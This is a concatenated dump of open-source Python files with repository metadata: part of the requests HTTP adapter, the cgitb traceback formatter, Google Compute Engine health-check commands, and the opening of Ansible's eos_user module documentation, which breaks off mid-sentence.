self.init_poolmanager(pool_connections, pool_maxsize, block=pool_block)
def __getstate__(self):
return {attr: getattr(self, attr, None) for attr in self.__attrs__}
def __setstate__(self, state):
# Can't handle by adding 'proxy_manager' to self.__attrs__ because
# self.poolmanager uses a lambda function, which isn't pickleable.
self.proxy_manager = {}
self.config = {}
for attr, value in state.items():
setattr(self, attr, value)
self.init_poolmanager(self._pool_connections, self._pool_maxsize,
block=self._pool_block)
def init_poolmanager(self, connections, maxsize, block=DEFAULT_POOLBLOCK, **pool_kwargs):
"""Initializes a urllib3 PoolManager.
This method should not be called from user code, and is only
exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param connections: The number of urllib3 connection pools to cache.
:param maxsize: The maximum number of connections to save in the pool.
:param block: Block when no free connections are available.
:param pool_kwargs: Extra keyword arguments used to initialize the Pool Manager.
"""
# save these values for pickling
self._pool_connections = connections
self._pool_maxsize = maxsize
self._pool_block = block
self.poolmanager = PoolManager(num_pools=connections, maxsize=maxsize,
block=block, strict=True, **pool_kwargs)
def proxy_manager_for(self, proxy, **proxy_kwargs):
"""Return urllib3 ProxyManager for the given proxy.
This method should not be called from user code, and is only
exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param proxy: The proxy to return a urllib3 ProxyManager for.
:param proxy_kwargs: Extra keyword arguments used to configure the Proxy Manager.
:returns: ProxyManager
:rtype: urllib3.ProxyManager
"""
if proxy in self.proxy_manager:
manager = self.proxy_manager[proxy]
elif proxy.lower().startswith('socks'):
username, password = get_auth_from_url(proxy)
manager = self.proxy_manager[proxy] = SOCKSProxyManager(
proxy,
username=username,
password=password,
num_pools=self._pool_connections,
maxsize=self._pool_maxsize,
block=self._pool_block,
**proxy_kwargs
)
else:
proxy_headers = self.proxy_headers(proxy)
manager = self.proxy_manager[proxy] = proxy_from_url(
proxy,
proxy_headers=proxy_headers,
num_pools=self._pool_connections,
maxsize=self._pool_maxsize,
block=self._pool_block,
**proxy_kwargs)
return manager
def cert_verify(self, conn, url, verify, cert):
"""Verify a SSL certificate. This method should not be called from user
code, and is only exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param conn: The urllib3 connection object associated with the cert.
:param url: The requested URL.
:param verify: Either a boolean, in which case it controls whether we verify
the server's TLS certificate, or a string, in which case it must be a path
to a CA bundle to use
:param cert: The SSL certificate to verify.
"""
if url.lower().startswith('https') and verify:
cert_loc = None
# Allow self-specified cert location.
if verify is not True:
cert_loc = verify
if not cert_loc:
cert_loc = extract_zipped_paths(DEFAULT_CA_BUNDLE_PATH)
if not cert_loc or not os.path.exists(cert_loc):
raise IOError("Could not find a suitable TLS CA certificate bundle, "
"invalid path: {}".format(cert_loc))
conn.cert_reqs = 'CERT_REQUIRED'
if not os.path.isdir(cert_loc):
conn.ca_certs = cert_loc
else:
conn.ca_cert_dir = cert_loc
else:
conn.cert_reqs = 'CERT_NONE'
conn.ca_certs = None
conn.ca_cert_dir = None
if cert:
if not isinstance(cert, basestring):
conn.cert_file = cert[0]
conn.key_file = cert[1]
else:
conn.cert_file = cert
conn.key_file = None
if conn.cert_file and not os.path.exists(conn.cert_file):
raise IOError("Could not find the TLS certificate file, "
"invalid path: {}".format(conn.cert_file))
if conn.key_file and not os.path.exists(conn.key_file):
raise IOError("Could not find the TLS key file, "
"invalid path: {}".format(conn.key_file))
def build_response(self, req, resp):
"""Builds a :class:`Response <requests.Response>` object from a urllib3
response. This should not be called from user code, and is only exposed
for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`
:param req: The :class:`PreparedRequest <PreparedRequest>` used to generate the response.
:param resp: The urllib3 response object.
:rtype: requests.Response
"""
response = Response()
# Fallback to None if there's no status_code, for whatever reason.
response.status_code = getattr(resp, 'status', None)
# Make headers case-insensitive.
response.headers = CaseInsensitiveDict(getattr(resp, 'headers', {}))
# Set encoding.
response.encoding = get_encoding_from_headers(response.headers)
response.raw = resp
response.reason = response.raw.reason
if isinstance(req.url, bytes):
response.url = req.url.decode('utf-8')
else:
response.url = req.url
# Add new cookies from the server.
extract_cookies_to_jar(response.cookies, req, resp)
# Give the Response some context.
response.request = req
response.connection = self
return response
def get_connection(self, url, proxies=None):
"""Returns a urllib3 connection for the given URL. This should not be
called from user code, and is only exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param url: The URL to connect to.
:param proxies: (optional) A Requests-style dictionary of proxies used on this request.
:rtype: urllib3.ConnectionPool
"""
proxy = select_proxy(url, proxies)
if proxy:
proxy = prepend_scheme_if_needed(proxy, 'http')
proxy_url = parse_url(proxy)
if not proxy_url.host:
raise InvalidProxyURL("Please check proxy URL. It is malformed"
" and could be missing the host.")
proxy_manager = self.proxy_manager_for(proxy)
conn = proxy_manager.connection_from_url(url)
else:
# Only scheme should be lower case
parsed = urlparse(url)
url = parsed.geturl()
conn = self.poolmanager.connection_from_url(url)
return conn
def close(self):
"""Disposes of any internal state.
Currently, this closes the PoolManager and any active ProxyManager,
which closes any pooled connections.
"""
self.poolmanager.clear()
for proxy in self.proxy_manager.values():
proxy.clear()
def request_url(self, request, proxies):
"""Obtain the url to use when making the final request.
If the message is being sent through a HTTP proxy, the full URL has to
be used. Otherwise, we should only use the path portion of the URL.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
:param proxies: A dictionary of schemes or schemes and hosts to proxy URLs.
:rtype: str
"""
proxy = select_proxy(request.url, proxies)
scheme = urlparse(request.url).scheme
is_proxied_http_request = (proxy and scheme != 'https')
using_socks_proxy = False
if proxy:
proxy_scheme = urlparse(proxy).scheme.lower()
using_socks_proxy = proxy_scheme.startswith('socks')
url = request.path_url
if is_proxied_http_request and not using_socks_proxy:
url = urldefragauth(request.url)
return url
def add_headers(self, request, **kwargs):
"""Add any headers needed by the connection. As of v2.0 this does
nothing by default, but is left for overriding by users that subclass
the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param request: The :class:`PreparedRequest <PreparedRequest>` to add headers to.
:param kwargs: The keyword arguments from the call to send().
"""
pass
def proxy_headers(self, proxy):
"""Returns a dictionary of the headers to add to any request sent
through a proxy. This works with urllib3 magic to ensure that they are
correctly sent to the proxy, rather than in a tunnelled request if
CONNECT is being used.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param proxy: The url of the proxy being used for this request.
:rtype: dict
"""
headers = {}
username, password = get_auth_from_url(proxy)
if username:
headers['Proxy-Authorization'] = _basic_auth_str(username,
password)
return headers
def send(self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None):
"""Sends PreparedRequest object. Returns Response object.
:param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
:param stream: (optional) Whether to stream the request content.
:param timeout: (optional) How long to wait for the server to send
data before giving up, as a float, or a :ref:`(connect timeout,
read timeout) <timeouts>` tuple.
:type timeout: float or tuple or urllib3 Timeout object
:param verify: (optional) Either a boolean, in which case it controls whether
we verify the server's TLS certificate, or a string, in which case it
must be a path to a CA bundle to use
:param cert: (optional) Any user-provided SSL certificate to be trusted.
:param proxies: (optional) The proxies dictionary to apply to the request.
:rtype: requests.Response
"""
try:
conn = self.get_connection(request.url, proxies)
except LocationValueError as e:
raise InvalidURL(e, request=request)
self.cert_verify(conn, request.url, verify, cert)
url = self.request_url(request, proxies)
self.add_headers(request, stream=stream, timeout=timeout, verify=verify, cert=cert, proxies=proxies)
chunked = not (request.body is None or 'Content-Length' in request.headers)
if isinstance(timeout, tuple):
try:
connect, read = timeout
timeout = TimeoutSauce(connect=connect, read=read)
except ValueError as e:
# this may raise a string formatting error.
err = ("Invalid timeout {}. Pass a (connect, read) "
"timeout tuple, or a single float to set "
"both timeouts to the same value".format(timeout))
raise ValueError(err)
elif isinstance(timeout, TimeoutSauce):
pass
else:
timeout = TimeoutSauce(connect=timeout, read=timeout)
try:
if not chunked:
resp = conn.urlopen(
method=request.method,
url=url,
body=request.body,
headers=request.headers,
redirect=False,
assert_same_host=False,
preload_content=False,
decode_content=False,
retries=self.max_retries,
timeout=timeout
)
# Send the request.
else:
if hasattr(conn, 'proxy_pool'):
conn = conn.proxy_pool
low_conn = conn._get_conn(timeout=DEFAULT_POOL_TIMEOUT)
try:
low_conn.putrequest(request.method,
url,
skip_accept_encoding=True)
for header, value in request.headers.items():
low_conn.putheader(header, value)
low_conn.endheaders()
for i in request.body:
low_conn.send(hex(len(i))[2:].encode('utf-8'))
low_conn.send(b'\r\n')
low_conn.send(i)
low_conn.send(b'\r\n')
low_conn.send(b'0\r\n\r\n')
# Receive the response from the server
try:
# For Python 2.7, use buffering of HTTP responses
r = low_conn.getresponse(buffering=True)
except TypeError:
# For compatibility with Python 3.3+
r = low_conn.getresponse()
resp = HTTPResponse.from_httplib(
r,
pool=conn,
connection=low_conn,
preload_content=False,
decode_content=False
)
except:
# If we hit any problems here, clean up the connection.
# Then, reraise so that we can handle the actual exception.
low_conn.close()
raise
except (ProtocolError, socket.error) as err:
raise ConnectionError(err, request=request)
except MaxRetryError as e:
if isinstance(e.reason, ConnectTimeoutError):
# TODO: Remove this in 3.0.0: see #2811
if not isinstance(e.reason, NewConnectionError):
raise ConnectTimeout(e, request=request)
if isinstance(e.reason, ResponseError):
raise RetryError(e, request=request)
if isinstance(e.reason, _ProxyError):
raise ProxyError(e, request=request)
if isinstance(e.reason, _SSLError):
# This branch is for urllib3 v1.22 and later.
raise SSLError(e, request=request)
raise ConnectionError(e, request=request)
except ClosedPoolError as e:
raise ConnectionError(e, request=request)
except _ProxyError as e:
raise ProxyError(e)
except (_SSLError, _HTTPError) as e:
if isinstance(e, _SSLError):
# This branch is for urllib3 versions earlier than v1.22
raise SSLError(e, request=request)
elif isinstance(e, ReadTimeoutError):
raise ReadTimeout(e, request=request)
else:
raise
return self.build_response(request, resp)
| artistic-2.0 |
pniedzielski/fb-hackathon-2013-11-21 | src/repl.it/jsrepl/extern/python/unclosured/lib/python2.7/cgitb.py | 113 | 12073 | """More comprehensive traceback formatting for Python scripts.
To enable this module, do:
import cgitb; cgitb.enable()
at the top of your script. The optional arguments to enable() are:
display - if true, tracebacks are displayed in the web browser
logdir - if set, tracebacks are written to files in this directory
context - number of lines of source code to show for each stack frame
format - 'text' or 'html' controls the output format
By default, tracebacks are displayed but not saved, the context is 5 lines
and the output format is 'html' (for backwards compatibility with the
original use of this module)
Alternatively, if you have caught an exception and want cgitb to display it
for you, call cgitb.handler(). The optional argument to handler() is a
3-item tuple (etype, evalue, etb) just like the value of sys.exc_info().
The default handler displays output as HTML.
"""
import inspect
import keyword
import linecache
import os
import pydoc
import sys
import tempfile
import time
import tokenize
import traceback
import types
def reset():
"""Return a string that resets the CGI and browser to a known state."""
return '''<!--: spam
Content-Type: text/html
<body bgcolor="#f0f0f8"><font color="#f0f0f8" size="-5"> -->
<body bgcolor="#f0f0f8"><font color="#f0f0f8" size="-5"> --> -->
</font> </font> </font> </script> </object> </blockquote> </pre>
</table> </table> </table> </table> </table> </font> </font> </font>'''
__UNDEF__ = [] # a special sentinel object
def small(text):
if text:
return '<small>' + text + '</small>'
else:
return ''
def strong(text):
if text:
return '<strong>' + text + '</strong>'
else:
return ''
def grey(text):
if text:
return '<font color="#909090">' + text + '</font>'
else:
return ''
def lookup(name, frame, locals):
"""Find the value for a given name in the given environment."""
if name in locals:
return 'local', locals[name]
if name in frame.f_globals:
return 'global', frame.f_globals[name]
if '__builtins__' in frame.f_globals:
builtins = frame.f_globals['__builtins__']
if type(builtins) is type({}):
if name in builtins:
return 'builtin', builtins[name]
else:
if hasattr(builtins, name):
return 'builtin', getattr(builtins, name)
return None, __UNDEF__
def scanvars(reader, frame, locals):
"""Scan one logical line of Python and look up values of variables used."""
vars, lasttoken, parent, prefix, value = [], None, None, '', __UNDEF__
for ttype, token, start, end, line in tokenize.generate_tokens(reader):
if ttype == tokenize.NEWLINE: break
if ttype == tokenize.NAME and token not in keyword.kwlist:
if lasttoken == '.':
if parent is not __UNDEF__:
value = getattr(parent, token, __UNDEF__)
vars.append((prefix + token, prefix, value))
else:
where, value = lookup(token, frame, locals)
vars.append((token, where, value))
elif token == '.':
prefix += lasttoken + '.'
parent = value
else:
parent, prefix = None, ''
lasttoken = token
return vars
def html(einfo, context=5):
"""Return a nice HTML document describing a given traceback."""
etype, evalue, etb = einfo
if type(etype) is types.ClassType:
etype = etype.__name__
pyver = 'Python ' + sys.version.split()[0] + ': ' + sys.executable
date = time.ctime(time.time())
head = '<body bgcolor="#f0f0f8">' + pydoc.html.heading(
'<big><big>%s</big></big>' %
strong(pydoc.html.escape(str(etype))),
'#ffffff', '#6622aa', pyver + '<br>' + date) + '''
<p>A problem occurred in a Python script. Here is the sequence of
function calls leading up to the error, in the order they occurred.</p>'''
indent = '<tt>' + small(' ' * 5) + ' </tt>'
frames = []
records = inspect.getinnerframes(etb, context)
for frame, file, lnum, func, lines, index in records:
if file:
file = os.path.abspath(file)
link = '<a href="file://%s">%s</a>' % (file, pydoc.html.escape(file))
else:
file = link = '?'
args, varargs, varkw, locals = inspect.getargvalues(frame)
call = ''
if func != '?':
call = 'in ' + strong(func) + \
inspect.formatargvalues(args, varargs, varkw, locals,
formatvalue=lambda value: '=' + pydoc.html.repr(value))
highlight = {}
def reader(lnum=[lnum]):
highlight[lnum[0]] = 1
try: return linecache.getline(file, lnum[0])
finally: lnum[0] += 1
vars = scanvars(reader, frame, locals)
rows = ['<tr><td bgcolor="#d8bbff">%s%s %s</td></tr>' %
('<big> </big>', link, call)]
if index is not None:
i = lnum - index
for line in lines:
num = small(' ' * (5-len(str(i))) + str(i)) + ' '
if i in highlight:
line = '<tt>=>%s%s</tt>' % (num, pydoc.html.preformat(line))
rows.append('<tr><td bgcolor="#ffccee">%s</td></tr>' % line)
else:
line = '<tt> %s%s</tt>' % (num, pydoc.html.preformat(line))
rows.append('<tr><td>%s</td></tr>' % grey(line))
i += 1
done, dump = {}, []
for name, where, value in vars:
if name in done: continue
done[name] = 1
if value is not __UNDEF__:
if where in ('global', 'builtin'):
name = ('<em>%s</em> ' % where) + strong(name)
elif where == 'local':
name = strong(name)
else:
name = where + strong(name.split('.')[-1])
dump.append('%s = %s' % (name, pydoc.html.repr(value)))
else:
dump.append(name + ' <em>undefined</em>')
rows.append('<tr><td>%s</td></tr>' % small(grey(', '.join(dump))))
frames.append('''
<table width="100%%" cellspacing=0 cellpadding=0 border=0>
%s</table>''' % '\n'.join(rows))
exception = ['<p>%s: %s' % (strong(pydoc.html.escape(str(etype))),
pydoc.html.escape(str(evalue)))]
if isinstance(evalue, BaseException):
for name in dir(evalue):
if name[:1] == '_': continue
value = pydoc.html.repr(getattr(evalue, name))
exception.append('\n<br>%s%s =\n%s' % (indent, name, value))
return head + ''.join(frames) + ''.join(exception) + '''
<!-- The above is a description of an error in a Python program, formatted
for a Web browser because the 'cgitb' module was enabled. In case you
are not reading this in a Web browser, here is the original traceback:
%s
-->
''' % pydoc.html.escape(
''.join(traceback.format_exception(etype, evalue, etb)))
def text(einfo, context=5):
"""Return a plain text document describing a given traceback."""
etype, evalue, etb = einfo
if type(etype) is types.ClassType:
etype = etype.__name__
pyver = 'Python ' + sys.version.split()[0] + ': ' + sys.executable
date = time.ctime(time.time())
head = "%s\n%s\n%s\n" % (str(etype), pyver, date) + '''
A problem occurred in a Python script. Here is the sequence of
function calls leading up to the error, in the order they occurred.
'''
frames = []
records = inspect.getinnerframes(etb, context)
for frame, file, lnum, func, lines, index in records:
file = file and os.path.abspath(file) or '?'
args, varargs, varkw, locals = inspect.getargvalues(frame)
call = ''
if func != '?':
call = 'in ' + func + \
inspect.formatargvalues(args, varargs, varkw, locals,
formatvalue=lambda value: '=' + pydoc.text.repr(value))
highlight = {}
def reader(lnum=[lnum]):
highlight[lnum[0]] = 1
try: return linecache.getline(file, lnum[0])
finally: lnum[0] += 1
vars = scanvars(reader, frame, locals)
rows = [' %s %s' % (file, call)]
if index is not None:
i = lnum - index
for line in lines:
num = '%5d ' % i
rows.append(num+line.rstrip())
i += 1
done, dump = {}, []
for name, where, value in vars:
if name in done: continue
done[name] = 1
if value is not __UNDEF__:
if where == 'global': name = 'global ' + name
elif where != 'local': name = where + name.split('.')[-1]
dump.append('%s = %s' % (name, pydoc.text.repr(value)))
else:
dump.append(name + ' undefined')
rows.append('\n'.join(dump))
frames.append('\n%s\n' % '\n'.join(rows))
exception = ['%s: %s' % (str(etype), str(evalue))]
if isinstance(evalue, BaseException):
for name in dir(evalue):
value = pydoc.text.repr(getattr(evalue, name))
exception.append('\n%s%s = %s' % (" "*4, name, value))
return head + ''.join(frames) + ''.join(exception) + '''
The above is a description of an error in a Python program. Here is
the original traceback:
%s
''' % ''.join(traceback.format_exception(etype, evalue, etb))
class Hook:
"""A hook to replace sys.excepthook that shows tracebacks in HTML."""
def __init__(self, display=1, logdir=None, context=5, file=None,
format="html"):
self.display = display # send tracebacks to browser if true
self.logdir = logdir # log tracebacks to files if not None
self.context = context # number of source code lines per frame
self.file = file or sys.stdout # place to send the output
self.format = format
def __call__(self, etype, evalue, etb):
self.handle((etype, evalue, etb))
def handle(self, info=None):
info = info or sys.exc_info()
if self.format == "html":
self.file.write(reset())
formatter = (self.format=="html") and html or text
plain = False
try:
doc = formatter(info, self.context)
except: # just in case something goes wrong
doc = ''.join(traceback.format_exception(*info))
plain = True
if self.display:
if plain:
doc = doc.replace('&', '&').replace('<', '<')
self.file.write('<pre>' + doc + '</pre>\n')
else:
self.file.write(doc + '\n')
else:
self.file.write('<p>A problem occurred in a Python script.\n')
if self.logdir is not None:
suffix = ['.txt', '.html'][self.format=="html"]
(fd, path) = tempfile.mkstemp(suffix=suffix, dir=self.logdir)
try:
file = os.fdopen(fd, 'w')
file.write(doc)
file.close()
msg = '<p> %s contains the description of this error.' % path
except:
msg = '<p> Tried to save traceback to %s, but failed.' % path
self.file.write(msg + '\n')
try:
self.file.flush()
except: pass
handler = Hook().handle
def enable(display=1, logdir=None, context=5, format="html"):
"""Install an exception handler that formats tracebacks as HTML.
The optional argument 'display' can be set to 0 to suppress sending the
traceback to the browser, and 'logdir' can be set to a directory to cause
tracebacks to be written to files there."""
sys.excepthook = Hook(display=display, logdir=logdir,
context=context, format=format)
| agpl-3.0 |
harshilasu/LinkurApp | y/google-cloud-sdk/platform/gcutil/lib/google_compute_engine/gcutil_lib/http_health_check_cmds.py | 4 | 13283 | # Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Commands for interacting with Google Compute Engine HTTP health checks."""
from google.apputils import appcommands
import gflags as flags
from gcutil_lib import command_base
FLAGS = flags.FLAGS
class HttpHealthCheckCommand(command_base.GoogleComputeCommand):
"""Base command for working with the HTTP health check collection."""
print_spec = command_base.ResourcePrintSpec(
summary=['name', 'host', 'port'],
field_mappings=(
('name', 'name'),
('description', 'description'),
('host', 'host'),
('port', 'port'),
('request-path', 'requestPath')),
detail=(
('name', 'name'),
('description', 'description'),
('creation-time', 'creationTimestamp'),
('host', 'host'),
('port', 'port'),
('request-path', 'requestPath'),
('check-interval-sec', 'checkIntervalSec'),
('check-timeout-sec', 'timeoutSec'),
('unhealthy-threshold', 'unhealthyThreshold'),
('healthy-threshold', 'healthyThreshold')),
sort_by='name')
resource_collection_name = 'httpHealthChecks'
# The default health check host.
DEFAULT_HOST = ''
# The default health check port.
DEFAULT_PORT = 80
# The default health check request path.
DEFAULT_REQUEST_PATH = '/'
# The default health check interval in seconds.
DEFAULT_CHECK_INTERVAL_SEC = 5
# The default health check timeout in seconds.
DEFAULT_CHECK_TIMEOUT_SEC = 5
# The default number of failures before marking a VM unhealthy.
DEFAULT_UNHEALTHY_THRESHOLD = 2
# The default number of successes before marking a VM healthy.
DEFAULT_HEALTHY_THRESHOLD = 2
def __init__(self, name, flag_values):
super(HttpHealthCheckCommand, self).__init__(name, flag_values)
class AddHttpHealthCheck(HttpHealthCheckCommand):
"""Create a new HTTP health check to handle network load balancing."""
positional_args = '<http-health-check-name>'
def __init__(self, name, flag_values):
super(AddHttpHealthCheck, self).__init__(name, flag_values)
flags.DEFINE_string('description',
'',
'An optional HTTP health check description.',
flag_values=flag_values)
flags.DEFINE_string('host',
self.DEFAULT_HOST,
'Specifies the value of the host header used in this '
'HTTP health check request. The default value is the '
'external IP address of the forwarding rule '
'associated with this target pool.',
flag_values=flag_values)
flags.DEFINE_string('request_path',
self.DEFAULT_REQUEST_PATH,
'Specifies the request path of the HTTP health check '
'request. The default path is \'/\'.',
flag_values=flag_values)
flags.DEFINE_string('port',
self.DEFAULT_PORT,
'Specifies the TCP port of the HTTP health check '
'request. The default port is \'80\'.',
flag_values=flag_values)
flags.DEFINE_integer('check_interval_sec',
self.DEFAULT_CHECK_INTERVAL_SEC,
'Specifies how often, in seconds, to send a health '
'check. The default is 5 seconds.',
flag_values=flag_values)
flags.DEFINE_integer('check_timeout_sec',
self.DEFAULT_CHECK_TIMEOUT_SEC,
'Specifies how long to wait, in seconds, before '
'the health check is considered a failure for each '
'individual instance. The default is 5 seconds. ',
flag_values=flag_values)
flags.DEFINE_integer('unhealthy_threshold',
self.DEFAULT_UNHEALTHY_THRESHOLD,
'Specifies how many consecutive health check '
'failures must happen before a previously healthy '
'VM is marked unhealthy. The default is 2.',
flag_values=flag_values)
flags.DEFINE_integer('healthy_threshold',
self.DEFAULT_HEALTHY_THRESHOLD,
'Specifies how many consecutive health check '
'successes must happen before a previously unhealthy '
'VM will be marked healthy. The default is 2.',
flag_values=flag_values)
def Handle(self, http_health_check_name):
"""Add the specified HTTP health check.
Args:
http_health_check_name: The name of the HTTP health check to add.
Returns:
The result of inserting the HTTP health check.
"""
http_health_check_context = self._context_parser.ParseContextOrPrompt(
'httpHealthChecks', http_health_check_name)
http_health_check_resource = {
'kind': self._GetResourceApiKind('httpHealthCheck'),
'name': http_health_check_context['httpHealthCheck'],
'description': self._flags.description,
'host': self._flags.host,
'requestPath': self._flags.request_path,
'port': self._flags.port,
'checkIntervalSec': self._flags.check_interval_sec,
'timeoutSec': self._flags.check_timeout_sec,
'unhealthyThreshold': self._flags.unhealthy_threshold,
'healthyThreshold': self._flags.healthy_threshold,
}
http_health_check_request = (self.api.http_health_checks.insert(
project=http_health_check_context['project'],
body=http_health_check_resource))
return http_health_check_request.execute()
class UpdateHttpHealthCheck(HttpHealthCheckCommand):
"""Update an HTTP health check to handle network load balancing.
Any fields left unset will be keep their original value.
"""
positional_args = '<http-health-check-name>'
safety_prompt = 'Update HTTP health check'
def __init__(self, name, flag_values):
super(UpdateHttpHealthCheck, self).__init__(name, flag_values)
flags.DEFINE_string('description',
None,
'An optional HTTP health check description.',
flag_values=flag_values)
flags.DEFINE_string('host',
None,
'Specifies a new value of the host header used in '
'this HTTP health check request.',
flag_values=flag_values)
flags.DEFINE_string('request_path',
None,
'Specifies a new request path of the HTTP health '
'check request.',
flag_values=flag_values)
flags.DEFINE_string('port',
None,
'Specifies a new TCP port of the HTTP health check '
'request.',
flag_values=flag_values)
flags.DEFINE_integer('check_interval_sec',
None,
'Specifies how often, in seconds, to send a health '
'check.',
flag_values=flag_values)
flags.DEFINE_integer('check_timeout_sec',
None,
'Specifies how long to wait, in seconds, before '
'the health check is considered a failure for each '
'individual instance.',
flag_values=flag_values)
flags.DEFINE_integer('unhealthy_threshold',
None,
'Specifies how many consecutive health check '
'failures must happen before a previously healthy VM '
'is marked unhealthy.',
flag_values=flag_values)
flags.DEFINE_integer('healthy_threshold',
None,
'Specifies how many consecutive health check '
'successes must happen before a previously unhealthy '
'VM will be marked healthy.',
flag_values=flag_values)
def Handle(self, http_health_check_name):
"""Modify the specified HTTP health check.
Args:
http_health_check_name: The name of the HTTP health check to modify.
Returns:
The result of modifying the HTTP health check.
"""
http_health_check_context = self._context_parser.ParseContextOrPrompt(
'httpHealthChecks', http_health_check_name)
http_hc_resource = {
'kind': self._GetResourceApiKind('httpHealthCheck'),
}
if self._flags.description is not None:
http_hc_resource['description'] = self._flags.description
if self._flags.host is not None:
http_hc_resource['host'] = self._flags.host
if self._flags.request_path is not None:
http_hc_resource['requestPath'] = self._flags.request_path
if self._flags.port is not None:
http_hc_resource['port'] = self._flags.port
if self._flags.check_interval_sec is not None:
http_hc_resource['checkIntervalSec'] = self._flags.check_interval_sec
if self._flags.check_timeout_sec is not None:
http_hc_resource['timeoutSec'] = self._flags.check_timeout_sec
if self._flags.unhealthy_threshold is not None:
http_hc_resource['unhealthyThreshold'] = self._flags.unhealthy_threshold
if self._flags.healthy_threshold is not None:
http_hc_resource['healthyThreshold'] = self._flags.healthy_threshold
http_health_check_request = (self.api.http_health_checks.patch(
httpHealthCheck=http_health_check_context['httpHealthCheck'],
project=http_health_check_context['project'], body=http_hc_resource))
return http_health_check_request.execute()
class GetHttpHealthCheck(HttpHealthCheckCommand):
"""Get an HTTP health check."""
positional_args = '<http-health-check-name>'
def __init__(self, name, flag_values):
super(GetHttpHealthCheck, self).__init__(name, flag_values)
def Handle(self, http_health_check_name):
"""Get the specified HTTP health check.
Args:
http_health_check_name: The name of the HTTP health check to get.
Returns:
The result of getting the HTTP health check.
"""
http_health_check_context = self._context_parser.ParseContextOrPrompt(
'httpHealthChecks', http_health_check_name)
http_health_check_request = self.api.http_health_checks.get(
project=http_health_check_context['project'],
httpHealthCheck=http_health_check_context['httpHealthCheck'])
return http_health_check_request.execute()
class DeleteHttpHealthCheck(HttpHealthCheckCommand):
"""Delete one or more HTTP health checks.
If multiple HTTP health check names are specified, the HTTP health checks
will be deleted in parallel.
"""
positional_args = '<http-health-check-name-1> ... <http-health-check-name-n>'
safety_prompt = 'Delete HTTP health check'
def __init__(self, name, flag_values):
super(DeleteHttpHealthCheck, self).__init__(name, flag_values)
def Handle(self, *http_health_check_names):
"""Delete the specified HTTP health checks.
Args:
*http_health_check_names: The names of the HTTP health checks to delete.
Returns:
Tuple (results, exceptions) - results of deleting the HTTP health checks.
"""
requests = []
for name in http_health_check_names:
http_health_check_context = self._context_parser.ParseContextOrPrompt(
'httpHealthChecks', name)
requests.append(self.api.http_health_checks.delete(
project=http_health_check_context['project'],
httpHealthCheck=http_health_check_context['httpHealthCheck']))
results, exceptions = self.ExecuteRequests(requests)
return (self.MakeListResult(results, 'operationList'), exceptions)
class ListHttpHealthChecks(HttpHealthCheckCommand,
command_base.GoogleComputeListCommand):
"""List the HTTP health checks for a project."""
def ListFunc(self):
"""Returns the function for listing HTTP health checks."""
return self.api.http_health_checks.list
def AddCommands():
appcommands.AddCmd('addhttphealthcheck', AddHttpHealthCheck)
appcommands.AddCmd('gethttphealthcheck', GetHttpHealthCheck)
appcommands.AddCmd('deletehttphealthcheck', DeleteHttpHealthCheck)
appcommands.AddCmd('listhttphealthchecks', ListHttpHealthChecks)
appcommands.AddCmd('updatehttphealthcheck', UpdateHttpHealthCheck)
| gpl-3.0 |
Inspq/ansible | lib/ansible/modules/network/eos/eos_user.py | 1 | 11534 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: eos_user
version_added: "2.3"
author: "Peter Sprygada (@privateip)"
short_description: Manage the collection of local users on EOS devices
description:
- This module provides declarative management of the local usernames
configured on Arista EOS devices. It allows playbooks to manage
either individual usernames or the collection of usernames in the
current running config. It also supports purging usernames from the
configuration that are not explicitly defined.
extends_documentation_fragment: eos
options:
users:
description:
- The set of username objects to be configured on the remote
Arista EOS device. The list entries can either be the username
or a hash of username and properties. This argument is mutually
exclusive with the C(username) argument.
username:
description:
- The username to be configured on the remote Arista EOS
device. This argument accepts a stringv value and is mutually
exclusive with the C(users) argument.
Please note that this option is not same as C(provider username).
update_password:
description:
- Since passwords are encrypted in the device running config, this
argument will instruct the module when to change the password. When
set to C(always), the password will always be updated in the device
and when set to C(on_create) the password will be updated only if
the username is created.
default: always
choices: ['on_create', 'always']
privilege:
description:
- The C(privilege) argument configures the privilege level of the
user when logged into the system. This argument accepts integer
values in the range of 1 to 15.
role:
description:
- Configures the role for the username in the
device running configuration. The argument accepts a string value
defining the role name. This argument does not check if the role
has been configured on the device.
sshkey:
description:
- Specifies the SSH public key to configure
for the given username. This argument accepts a valid SSH key value.
nopassword:
description:
- Defines the username without assigning
a password. This will allow the user to login to the system
without being authenticated by a password.
type: bool
purge:
description:
- Instructs the module to consider the
resource definition absolute. It will remove any previously
configured usernames on the device with the exception of the
`admin` user which cannot be deleted per EOS constraints.
type: bool
default: false
state:
description:
- Configures the state of the username definition
as it relates to the device operational configuration. When set
to I(present), the username(s) should be configured in the device active
